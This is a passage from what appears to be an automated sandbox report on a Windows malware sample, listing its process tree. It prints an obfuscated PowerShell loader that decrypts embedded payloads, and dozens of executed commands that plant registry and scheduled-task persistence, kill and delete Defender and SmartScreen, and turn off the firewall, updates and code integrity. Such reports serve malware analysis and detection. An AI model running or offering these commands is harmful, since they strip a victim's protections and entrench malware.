$hYpAi=$TAWjc.EntryPoint; $hYpAi.Invoke($null, $param2_var);}$bHXSX = 'C:\Users\Admin\AppData\Local\Temp\0uqhlpmx.pkq.bat';$host.UI.RawUI.WindowTitle = $bHXSX;$AnHdV=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bHXSX).Split([Environment]::NewLine);foreach ($Yltfo in $AnHdV) { if ($Yltfo.StartsWith('CFYIvkGECqujgRZhzKOC')) { $GVQOC=$Yltfo.Substring(20); break; }}$payloads_var=[string[]]$GVQOC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:4032
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1416
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5532
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5920
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4424
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3396
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1496
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2272
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SYSTEM\CurrentControlSet\Services' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2972
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4284
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5948
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3628
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5628
- C:\Windows\SYSTEM32\schtasks.exe
  "schtasks" /create /tn "lockwin" /sc MINUTE /mo 1 /tr "C:\Users\Admin\AppData\Local\Temp\h2uasj3u.yo3.exe" /rl LIMITED /f
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2744
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im SecurityHealthSystray.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1348
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im SecurityHealthSystray.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5256
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im SecurityHealthService.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4352
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im SecurityHealthService.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5060
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5520
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im MsMpEng.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:6136
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im NisSrv.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:6096
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im NisSrv.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:6088
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /im Explorer.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:5224
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /im Explorer.exe /f
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:3400
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im SmartScreen.exe
  2⤵
  PID:4712
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im SmartScreen.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3040
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im mrt.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2028
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im mrt.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5512
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\MsMpEng.exe"
  2⤵
  PID:4732
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\mrt.exe"
  2⤵
  PID:3188
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\NisSrv.exe"
  2⤵
  PID:4664
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\smartscreen.exe"
  2⤵
  PID:4124
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f
  2⤵
  PID:2012
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f
    3⤵
    PID:5900
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  PID:1944
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender DisableAntiSpyware settings
    PID:5448
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:624
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -SubmitSamplesConsent 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:828
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
  2⤵
  PID:3832
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
    3⤵
    PID:4684
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f
  2⤵
  PID:4612
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f
    3⤵
    PID:5368
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableControlledFolderAccess Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5072
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -MAPSReporting Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3172
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
  2⤵
  PID:116
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1096
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
  2⤵
  PID:4500
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:4212
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
  2⤵
  PID:5104
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:5208
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1932
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4384
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableOnAccessProtection $true"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3944
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ExploitGuard\Controlled Folder Access" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
  2⤵
  PID:3628
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ExploitGuard\Controlled Folder Access" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
    3⤵
    PID:4336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableControlledFolderAccess Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5972
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\KernelModeCodeIntegrity" /v Enabled /t REG_DWORD /d 0 /f
  2⤵
  PID:5324
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\KernelModeCodeIntegrity" /v Enabled /t REG_DWORD /d 0 /f
    3⤵
    PID:5044
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ProcessMitigation -System -Disable KernelModeCodeIntegrity"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3744
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
  2⤵
  PID:4288
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
    3⤵
    PID:3096
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer' -Name 'SmartScreenEnabled' -Value 'Off'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5808
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f
  2⤵
  PID:4812
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f
    3⤵
    PID:5760
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter' -Name 'EnabledV9' -Value 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:6140
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
  2⤵
  PID:428
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
    3⤵
    - Modifies firewall policy service
    PID:3544
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5304
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
  2⤵
  PID:4592
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
    3⤵
    PID:4468
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU' -Name 'NoAutoUpdate' -Value 1"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5424
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f > nul
  2⤵
  PID:6016
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f
    3⤵
    - Modifies registry key
    PID:5824
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} safeboot minimal
  2⤵
  PID:388
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {current} safeboot minimal
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:5516
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 67108863 /f > nul
  2⤵
  PID:4560
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
    3⤵
    - Modifies registry key
    PID:5820
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power" /v HiberbootEnabled /t REG_DWORD /d 0 /f
  2⤵
  PID:3048
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power" /v HiberbootEnabled /t REG_DWORD /d 0 /f
    3⤵
    PID:1800
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d 1 /f
  2⤵
  PID:1096
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d 1 /f
    3⤵
    PID:5660
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' -Name 'Notification_Suppress' -Value 1"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2520
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\Policy" /v DisableNotifications /t REG_DWORD /d 1 /f
  2⤵
  PID:6072
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\Policy" /v DisableNotifications /t REG_DWORD /d 1 /f
    3⤵
    PID:3980
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\Policy' -Name 'DisableNotifications' -Value 1"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2912
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im OneDrive.exe & %SystemRoot%\SysWOW64\OneDriveSetup.exe /uninstall
  2⤵
  PID:1080
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OneDrive.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1120
- - C:\Windows\SysWOW64\OneDriveSetup.exe
    C:\Windows\SysWOW64\OneDriveSetup.exe /uninstall
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5840
  - - C:\Windows\SysWOW64\OneDriveSetup.exe
      "C:\Windows\SysWOW64\OneDriveSetup.exe" C:\Windows\SysWOW64\OneDriveSetup.exe /uninstall /permachine /childprocess /silent /enableOMCTelemetry /enableExtractCabV2 /cusid:S-1-5-21-3920955164-3782810283-1225622749-1000
      4⤵
      System Location Discovery: System Language Discovery
      PID:5076
  - - C:\Windows\SysWOW64\OneDriveSetup.exe
      C:\Windows\SysWOW64\OneDriveSetup.exe /uninstall /peruser /childprocess /enableOMCTelemetry /enableExtractCabV2
      4⤵
      System Location Discovery: System Language Discovery
      PID:2584
    - - C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe
        
        "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe" /uninstall
        5⤵
        
        PID:5924
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /delete /tn "\Microsoft\Windows\OneDrive\OneDrive Reporting" /f
  2⤵
  - Indicator Removal: Clear Persistence
  PID:3600
- - C:\Windows\system32\schtasks.exe
    schtasks /delete /tn "\Microsoft\Windows\OneDrive\OneDrive Reporting" /f
    3⤵
    PID:3876
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableNetworkProtection /t REG_DWORD /d 0 /f
  2⤵
  PID:4852
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableNetworkProtection /t REG_DWORD /d 0 /f
    3⤵
    PID:1748
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
  2⤵
  PID:3508
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
    3⤵
    PID:6120
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableNetworkProtection Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:656
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableControlledFolderAccess Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3960
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
  2⤵
  PID:4792
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
    3⤵
    PID:3516
